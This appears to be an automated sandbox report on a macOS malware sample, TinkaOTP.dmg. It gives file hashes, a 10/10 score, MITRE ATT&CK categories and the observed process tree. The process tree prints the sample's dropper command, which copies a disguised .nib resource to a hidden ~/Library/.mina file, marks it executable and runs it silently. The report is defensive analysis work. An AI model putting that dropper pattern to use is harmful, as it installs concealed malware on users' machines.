Resubmissions

  • 12-06-2021 11:09
    210612-nqn9qdfdq2 10
  • 12-06-2021 11:04
    210612-h83qfce7ax 10
  • 12-06-2021 10:49
    210612-mkbljdyans 10
  • 04-06-2021 11:41
    210604-617hnrwhna 10
  • 03-06-2021 22:37
    210603-9ndgvgx33n 10
  • 03-06-2021 17:09
    210603-gxrvff2tan 10
  • 03-06-2021 16:24
    210603-lv4d7lhgcs 10

Analysis

  • max time network
    155s
  • platform
    macos_amd64
  • resource
    macos
  • submitted
    03-06-2021 17:09

General

  • Target
    TinkaOTP.dmg
  • Size
    6MB
  • MD5
    81f8f0526740b55fe484c42126cd8396
  • SHA1
    fe83d95afce63e935dbe22aef40a164cee34f4e5
  • SHA256
    899e66ede95686a06394f707dd09b7c29af68f95d22136f0a023bfd01390ad53
  • SHA512
    751c2195a47d5e263ccfb860037ce32b5bc3c9ca516b9806a0cf1bae2af9742bcc3c9965218fd938e6c3eaa5a90081ece877aeec56f667477686daa3aeb6d77a

Score
10/10

Malware Config

Signatures

Processes

  • /bin/sh
    sh -c "sudo open /Volumes/TinkaOTP/TinkaOTP.app"
    PID:464
  • /bin/bash
    sh -c "sudo open /Volumes/TinkaOTP/TinkaOTP.app"
    PID:464
  • /usr/bin/sudo
    sudo open /Volumes/TinkaOTP/TinkaOTP.app
    PID:464
    • /usr/bin/open
      open /Volumes/TinkaOTP/TinkaOTP.app
      PID:465
  • /Volumes/TinkaOTP/TinkaOTP.app/Contents/MacOS/TinkaOTP
    /Volumes/TinkaOTP/TinkaOTP.app/Contents/MacOS/TinkaOTP
    PID:466
  • /bin/bash
    /bin/bash -c "cp /Volumes/TinkaOTP/TinkaOTP.app/Contents/Resources/Base.lproj/SubMenu.nib ~/Library/.mina > /dev/null 2>&1 && chmod +x ~/Library/.mina > /dev/null 2>&1 && ~/Library/.mina > /dev/null 2>&1"
    PID:469
    • /bin/cp
      cp /Volumes/TinkaOTP/TinkaOTP.app/Contents/Resources/Base.lproj/SubMenu.nib /Users/run/Library/.mina
      PID:470
    • /bin/chmod
      chmod +x /Users/run/Library/.mina
      PID:471
    • /Users/run/Library/.mina
      /Users/run/Library/.mina
      PID:472

Network

MITRE ATT&CK Matrix

  • Collection
  • Command and Control
  • Credential Access
  • Defense Evasion
  • Discovery
  • Execution
  • Exfiltration
  • Impact
  • Initial Access
  • Lateral Movement
  • Persistence
  • Privilege Escalation


Downloads

  • /Users/run/Library/.mina
    MD5
    f05437d510287448325bac98a1378de1
    SHA1
    fa3deb60b8a2eaa29a7dccf14bee6adae81f442f
    SHA256
    846d8647d27a0d729df40b13a644f3bffdc95f6d0e600f2195c85628d59f1dc6
    SHA512
    466999585e7b09e729def6e13c719b656ba7ee9ca43ea32c8fb3a6177de81a75caf9bd5eb0c0ac172c2b7fea3c1aa57d10349ff98aac472fe2ffafde8cd30165